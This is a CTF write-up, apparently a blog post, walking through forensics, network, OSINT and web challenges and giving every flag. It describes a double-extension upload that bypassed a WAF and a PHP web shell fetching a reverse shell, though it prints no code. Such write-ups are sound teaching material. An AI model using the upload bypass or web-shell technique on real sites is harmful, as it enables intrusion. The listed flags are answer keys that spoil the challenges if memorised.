I had the privilege of participating in an individual Capture The Flag (CTF) event hosted by Cybertalents, wherein I achieved first place by successfully solving all of the challenges presented. This article serves as a comprehensive write-up, recounting the experience and providing insights into the various intriguing challenges encountered. Have fun.
Note: The Writeup will start with Hard and go until easy
Let’s just get started.
Challenge Name: History 102
Difficulty: Hard
Category: Digital Forensics
In this challenge, we got an image file for a Windows system. I used FTK Imager for looking around for anything looking weird, and I have checked the most common places when it comes to forensics, like downloads, documents, desktops, and temp directories.
The only thing I have found is this, which is a bit sus.
So, I get the hash of the executable, and looking at the virus total, it shows that it is malicious.
Now we have the first part of the flag Flag{316fcaf0160b0025e13187624d0ac081_?_?}
The challenge name is History, so it kind of makes sense to check the history of the browser. Also, the challenge says the ads got him.
Checking history at this path AppData/Local/Micorosoft/Edge/UserData/Default/History. Open it with any SQL lite viewer.
Now you got the second part Flag{316fcaf0160b0025e13187624d0ac081_156.26.173.114_?}
For the last part of the flag, it requires a bit of reverse, but before that, let me explain the mindset. We need to get the wallet address that it may be a bitcoin address or smth, so normally attackers leave that as a note on Desktop folder, but in our case, there are no files there. After checking the strings on the malicious executable and doing some basic static analysis, I had no luck.
That’s when i decided to fire IDA, which is debugger that reverse engineers use for extracting IOCs and doing their reverse nerdy stuff
When I fired, I noticed this string 'secr3t', which is value that the malware stored inside this registry key SOFTWARE\Microsoft\Windows NT\CurrentVersion.
I have exported the SOFTWARE Hive and checked this secr3t value, and we got something.
Hella weird, right? I grabbed this nonsense and told Cyberchef I wanted to do something that made sense from that.
CyberChef never disappoints me.
Now we got the three parts of the flag Flag{316fcaf0160b0025e13187624d0ac081_156.26.173.114_bc1qxy2kgdygjrsqtzq2n0yrf2493!83kkfjhx0wlh}
Challenge Name: T3ST4R
Difficulty: Medium
Category: Network Forensics
We got a PCAP file, and the description says that our website got hacked, and the attackers hid something.
Filtering for HTTP requests
You going to notice that there are a bunch of POST requests to panel.php from 192.168.235.137
Checking these streams, you are going to find a flag.jpg that he is uploading. Easy
Export the file and open it.
Well, we got played and felled into the rabbit hole.
Continue our analysis. I have found ‘elephant.php.png’ and why there is double extension. It is because this is a technique that attackers use to bypass the WAF, if the WAF only allowing a Png files. So, the attacker tricked the WAF and uploaded a php file.
Checking the content of the php file
So, the attacker file simply loads this URL and pass to shell_exec() function, so it may be a reverse shell. It was kind of obvious for me because of my pen test background, as when I saw PentestMonkey all the reverse shell alarms just started going.
After checking the URL, it downloaded a favicon file, which after doing strings on it It appears that it does indeed contain a reverse shell.
This string looks like it needs decryption. Getting the string and going to CyberChef
You will get most of the flag, and you can guess the rest easily.
Flag{0H_1M_H3R3_MY_FR13N6_Y0U_G0T_MY_B4CKD00R}
Challenge Name: Job
Difficulty: easy
Category: Digital Forensics
In this one, we got an .eml file, which is an extension of an email file. Checking it with any mail software or text editor, you can notice that there is an attachment that was sent with the email.
So, downloading the docx file and checking if there is any macors inside it with oletools. olevba -c <document.docx>
We are going to notice there is VBA Macro inside the document, but it is base64 encoded. Decode it.
You can get your flag which is Flag{162.219.145.2:184}
Challenge Name: Qakbot Case
Difficulty: Easy
Category: Digital Forensics
In this one, we got an event log file after opening it with Event Log Explorer and searching for .br
We got only one result.
Which gave us the flag right away. Flag{graficalevi.com.br}
Challenge Name: D4rkHun7
Difficulty: easy
Category: OSINT
Searching for an AlphaBay administrator. It appears that his name is Alexandre Cazes.
In the CTF, he asks for his mobile signing keys. Searching with Alexandre Cazes Signing keys. You will notice this, dude.
Checking his mobile devices there we got our flag. flag{01202cfd4f25d1b8208b3bfcfb3601c5ba32a3b842b7cbb522b69216932e6502da170a}
Challenge Name: easywin
Difficulty: easy
Category: Web Security
After opening the link, we got this site that says you don’t need an account.
Looking at the source code, we see this JS code that is obfuscated.
Looking closely at that code
We have something called 5up3res3cre3t.html, accessing this endpoint will give us the flag.
NOW, I have included everything except two challenges, Serv3r, Admin and that’s because they are actually taken from Boss of the SOC v1 famous CTF, so you can just check any writeup for it, as it even contains more juicy information.
That’s it for now.
Cya geeks.
